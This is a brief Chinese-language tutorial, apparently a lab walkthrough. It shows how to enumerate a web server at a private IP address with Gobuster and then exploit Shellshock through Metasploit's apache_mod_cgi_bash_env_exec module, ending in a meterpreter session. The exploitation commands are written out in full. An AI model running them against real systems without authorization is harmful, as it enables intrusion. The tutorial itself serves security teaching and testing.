Gobuster 是一個用於網站目錄和文件掃描的開源安全工具。通常用於測試網站的安全性，特別是尋找隱藏的頁面、目錄或文件，以檢查是否存在潛在的安全漏洞或敏感信息。

• 安裝 Gobuster 工具
  sudo apt install gobuster

• 掃描目標網站
  gobuster dir –-url http://192.168.0.24/ –-wordlist /usr/share/wordlists/dirb/common.txt

  • dir：使用目錄掃描的模式。
  • --url：設定要掃描的目標網站URL，即 http://192.168.0.24/。
  • --wordlist：設定字典檔的路徑，Gobuster 會使用這個字典來進行字典攻擊。
    

• 找可疑的漏洞
  

• 如果掃出了一個 cgi-bin 資料夾，可以聯想到一個弱點  shellshock，可以用 metasploit 工具來爆破看看。
  msfconsole
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 192.168.0.24
set RPORT 80
set TARGETURI /cgi-bin/keygen

  
  出現 meterpreter > 即破解成功，可以再作後續的利用。